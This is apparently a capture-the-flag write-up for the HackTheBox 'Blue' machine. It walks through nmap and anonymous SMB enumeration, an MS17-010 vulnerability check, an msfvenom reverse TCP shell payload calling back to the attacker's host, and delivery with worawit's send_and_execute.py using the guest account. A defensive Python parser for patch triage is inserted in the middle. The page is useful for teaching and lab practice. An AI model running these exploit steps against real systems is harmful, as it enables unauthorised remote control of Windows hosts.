HackTheBox Blue Writeup
Enjoy reading my HTB Blue Writeup
Information Gathering
Let's begin with an nmap scan to gather some information about the HTB Blue machine:
sudo nmap -p 1-5000 -sV -sC -O -v 10.10.10.40
We have three open ports:
- Port 135: Microsoft Windows RPC
- Port 139: Microsoft Windows netbios-ssn
- Port 445: Microsoft-DS (Windows 7 Professional 7601 SP1)
Okay, so there does not seem to be an Active Directory running, but we have a Windows machine with Windows 7 Professional SP1 installed.
Next, enumerate the SMB shares:
smbclient -L \\\\10.10.10.40\\
Without entering a password we were able to list the shares:
Enter WORKGROUP\user's password:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        Share           Disk
        Users           Disk
I investigated the "Share" and "Users" share but couldn't find anything interesting. Let's keep in mind that we are able to connect to those and move on.
Eternal Blue
I used the Python checker script from worawit's GitHub repository in order to check whether the HTB Blue machine got patched or is vulnerable to Eternal Blue. In fact, it didn't get patched:
└──╼ $python checker.py 10.10.10.40 445
Trying to connect to 10.10.10.40:445
Target OS: Windows 7 Professional 7601 Service Pack 1
The target is not patched

=== Testing named pipes ===
spoolss: STATUS_ACCESS_DENIED
samr: STATUS_ACCESS_DENIED
netlogon: STATUS_ACCESS_DENIED
lsarpc: STATUS_ACCESS_DENIED
browser: STATUS_ACCESS_DENIED
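For asset owners who run the same checker across their own inventory, the output above can be parsed into a record and given a patch priority. This is an added example, not part of the original writeup or of worawit's repository; the function names, the priority labels and the "The target is patched" wording are assumptions, and the sample text is reconstructed from the output shown above.

```python
import re

# Constructed sample: the checker output shown above, shell prompt removed.
SAMPLE = """Trying to connect to 10.10.10.40:445
Target OS: Windows 7 Professional 7601 Service Pack 1
The target is not patched

=== Testing named pipes ===
spoolss: STATUS_ACCESS_DENIED
samr: STATUS_ACCESS_DENIED
netlogon: STATUS_ACCESS_DENIED
lsarpc: STATUS_ACCESS_DENIED
browser: STATUS_ACCESS_DENIED
"""

def parse_checker(text):
    """Parse one checker run into a record for an asset inventory."""
    rec = {"host": None, "port": None, "os": None, "patched": None, "pipes": {}}
    in_pipes = False
    for line in (l.strip() for l in text.splitlines()):
        if m := re.fullmatch(r"Trying to connect to (\S+):(\d+)", line):
            rec["host"], rec["port"] = m.group(1), int(m.group(2))
        elif line.startswith("Target OS:"):
            rec["os"] = line.split(":", 1)[1].strip()
        # Only the "not patched" wording appears on the page; the positive
        # form matched here is an assumption about the tool's other verdict.
        elif m := re.fullmatch(r"The target is (not )?patched", line):
            rec["patched"] = m.group(1) is None
        elif line.startswith("==="):
            in_pipes = "named pipes" in line
        elif in_pipes and ": " in line:
            name, status = line.split(": ", 1)
            rec["pipes"][name] = status
    return rec

def triage(rec):
    """Return (priority, notes); the priority labels are this example's own."""
    if rec["patched"] is None:
        return "rescan", ["no verdict line in output"]
    if rec["patched"]:
        return "ok", []
    notes = ["host reports unpatched on port %d: %s" % (rec["port"], rec["os"])]
    denied = [p for p, s in rec["pipes"].items() if s == "STATUS_ACCESS_DENIED"]
    if rec["pipes"] and len(denied) == len(rec["pipes"]):
        # Null session was refused, but the page still got in as 'guest'.
        notes.append("pipes deny null session; also audit the Guest account")
    return "patch-now", notes

if __name__ == "__main__":
    print(triage(parse_checker(SAMPLE)))
```

A run with every pipe at STATUS_ACCESS_DENIED still comes out as "patch-now": the pipe results do not lower the priority of an unpatched host.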
Generate a payload using msfvenom in order to gain a reverse TCP shell:
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.180 LPORT=9988 -f exe > payload.exe
Next we have to modify the send_and_execute.py script from worawit. Replace username='' with username='guest'.
Then we can start a netcat listener and send the payload to the target machine:
python send_and_execute.py 10.10.10.40 payload.exe 445
The user flag is located in C:\Users\haris\Desktop and the root flag in the Desktop directory of Administrator.
Tags: HTB, HackTheBox, Blue, MS17-010